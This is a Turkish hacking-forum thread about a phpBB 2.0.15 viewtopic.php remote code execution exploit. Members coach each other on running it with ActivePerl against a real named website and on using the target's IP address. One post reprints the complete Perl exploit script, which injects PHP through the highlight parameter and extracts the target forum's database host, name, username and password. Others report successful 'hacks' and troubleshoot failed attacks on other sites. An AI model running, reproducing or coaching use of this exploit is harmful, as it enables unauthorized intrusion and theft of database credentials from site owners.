folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit



Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek
    2PAC bunu yazdı:



    bi b.k anlamadm walla.....


     


     


    pro nerde neyi nerde ve nasıl kullanacağız? sanki bunları sadece bilenler kendi aralarında paylaşıyorlarmı  ...yanii..ne bilim hocam öğretmenlik yapacak birileri.....


     


    eğitim şart  dimi ama






    güzel kardeşim istersen sen hacklemek istediğin site adreslerini ver hatta verme biz google dan buluruz senin yerine index atalım hatta zone-h ye ekleyelim senin yerine?
    arkadaş anlatmış dosyayı kaydet perl in bin dizininde şu şekilde çalıştır demiş hatta screenshot bile koymuş bunuda yapamıyosanız dediğim gibi sizin yerinize index atalım?

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Archon
    Archon's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    FiSTaNDaNTiLuS bunu yazdı:



    ben perl/bin dizinine exploiti "phpbbSecureD.pl" şeklinde kaydetim perli açıp alttaki kod satırını yazdım ama kabul etmedi. Site örnektir..


    perl phpbbSecureD.pl www.akvadi.com /akvadi/ 80


    Semicolon seems to be missing hatası veriyor neyi yanlış yapıyorum?





    aynı hatayı bende de veriyor.

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Archon
    Archon's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek

    Seer bunu yazdı:






    FiSTaNDaNTiLuSDİKKAT:Az ewwel yazmıs oldugum cevapta yanlıslık var
    80 yerine 20 veya 8 Gelicek!!!!!!

    5-6Dk önceki hacked.cok güzel bi sekilde calısıyor






    bu arada yukarıdaki kod ile senin kodun aynı değilmiş galiba seer www.milw0rm.com dan sendeki kodu indirdim bu sefer de can't locate IO/socket.pm hatası aldım dosyayı google da aratıp kopyaladım ama ilk satırda hata buldu bu sefer.


     herhalde yanlış dosya indirdim bana bu dosyayı verebilirmisiniz.


     

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Kullanmıs oldugum ir2 nin vermiş oldugu Pl exploitidir!
    Herhangi bir yerden bulmadım!
    Tesekkurler ir2:)

    Perl Exploiti nedir?nasıl kullanılır diyenler icin Dokuman
    Buyrun takıldıgınız yerde foruma yazın veya mailden ulasın
    Kolay gelsin
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek

    -Klasor Secenekleri>Görünüm>Bilinen Dosya türleri icin uzantıları gizle
    Secenegini kaldırın
    Dosyalar artık uzantılarıyla görünücek örn:seer.txt


    -ir2 nin yayınlamıs oldugu kodları kopyalayın. yeni bir txt dosyası olusturun
    dosyayı phpBBSecureD.pl seklinde kaydedin. txt uzantısı yerine pl gelicek


    -Kod hazır.Bunu kuracagımız Active Perl in "Bin" dizini altına atıyoruz
    Active Perli
    www.activeperl.com den indiriyorsunuz:)


    -Perli kuruyorsunuz


    -Komut sistemine gelip "cd.." yapıyoruz taki C:\ kök dizinine gelene kadar


    -Sonra screnshoot ta göstermiş olduklarımı uygularsanız tamadır


    /////NOTlar://///
    -Domain degil ip adresi yazıyoruz
    Akvadi.com degilde akvadinin ipsi
    (ping akvadi.com :):):) )


    -explotin nasıl calıstıgını ögrenmek icin
    "perl exploitadi.pl" veya "perl exploitadi.pl -h
    www.domainadi.com" seklinde uygulamıs oluyoruz


    Size Ex'in nasıl kullanılacagını Exploit anlatıyor


    -Perl i kullanmak icin DOS komutlarını bilmekte fayda var


    -FiSTaNDaNTiLuS adlı arkadasa msnde anlattım.Ona basvura bilirsiniz:)


    Kolay gelsin bundan fazlasını birsey beklemeyin.


    Seer...

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    phyt0n hatası verenler aşşağıdaki ex e aynı uygulamaları yapın bende vermiyor..


    #!/usr/bin/perl


    # **************************************************************
    #**
    #** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
    #** This exploit gives the user all the details about the database
    #** connection such as database host, username, password and
    #** database name.
    #**
    #** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
    #**
    #** Greetings to GvR, Jumento, PP, CKrew & friends
    #**
    # **************************************************************


    use IO::Socket;


    print "+-----------------------------------------------------------------------+\r\n";
    print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
    print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
    print "+-----------------------------------------------------------------------+\r\n";


    if (@ARGV < 3)
    {
    print "Usage:\r\n";
    print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
    print "SERVER - Server where PhpBB is installed.\r\n";
    print "DIR - PHPBB directory or / for no directory.\r\n";
    print "THREADID - Id of an existing thread.\r\n";
    print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
    print " Use this when a thread needs authentication for viewing\r\n";
    print " You can use Firefox in combination with \"Live HTTP\r\n";
    print " Headers\" to get this cookiestring.\r\n\r\n";
    print "Example 1 (with cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
    phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
    autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
    userid%22%3Bs%3A1%3A%222%22%3B%7D;
    phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
    print "Example 2 (without cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
    exit();
    }


    $serv = $ARGV[0];
    $dir = $ARGV[1];
    $threadid = $ARGV[2];
    $cookie = $ARGV[3];


    $serv =~ s/http:\/\///ge;
    $delimit = "GvRSecureD";


    $sploit = $dir . "viewtopic.php?t=";
    $sploit .= $threadid;
    $sploit .= "&highlight='.printf($delimit.";
    $sploit .= "\$dbhost.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbname.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbuser.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbpasswd.";
    $sploit .= "$delimit).'";


    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
    or die "[+] Connecting ... Could not connect to host.\n\n";


    print "[+] Connecting OK\n";
    sleep(1);


    print "[+] Sending exploit ";
    print $sock "GET $sploit HTTP/1.1\r\n";
    print $sock "Host: $serv\r\n";
    if ( defined $cookie) {
    print $sock "Cookie: $cookie \r\n";
    }
    print $sock "Connection: close\r\n\r\n";



    $succes = 0;


    while ($answer = <$sock>) {
    $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
    $succes = 1;
    $urlIndex = index $answer, "href";
    if ($urlIndex < 0){
    $answer = substr($answer, length($delimit));
    $length = 0;
    while (length($answer) > 0) {
    $nex = index($answer, $delimit);
    if ($nex > 0) {
    push(@array, substr($answer, 0, $nex));
    $answer = substr($answer, $nex + length($delimit), length($answer));
    } else {
    $answer= "";
    }
    }
    }
    }
    }


    close($sock);


    if ($succes == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host: " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name: " . $array[1] . "\n";
    sleep(1);
    print "[+] Username: " . $array[2] . "\n";
    sleep(1);
    print "[+] Password: " . $array[3] . "\n";
    sleep(1);
    } else {
    print "FAILED\n";
    }


    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Archon
    Archon's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek

    hepinize teşekkür ediyorum benim hatam kullandığım perlden kaynaklanıyormuş arkadaşın verdiği linkten activeperl ü indirip kurunca olay çözüldü.


    döküman için de ayrıca teşekkürler seer

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Rica ederim.Gelirisi gelicek allahın izinyle
    MCSE üzerinde yazmayı planlıyorum.bakalım artık
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Archon
    Archon's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek

    yalnız benim bir sorum daha olacak forumun versiyonu phpBB 2.0.15 olduğu kesin olduğu halde connecting ok


    sending exploit failed


    demesinin ne gibi sebepleri olabilir. yani kullandığı server fln engellemiş olabilir mi yoksa hata kesinlikle bendemi yani kodun parametrelerini yanlış girmek fln gibi. bende hata yok gibi gözüküyor çünkü seerin screen shotındaki ip yi girdim ve aynı cevabı aldım. ama diğer site de failed yazdı.

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek

    2 Sebebi var

    1.si O sitede exploitin mevcut olmaması
    2.si Yanlıs deger girmen
    (örn: /forumlarimiz/ seklinde bi forum yolu olsun bunu dikkatsizlik sonucu  /forum/ seklinde calıstırman.veya vb seyler

Toplam Hit: 4479 Toplam Mesaj: 23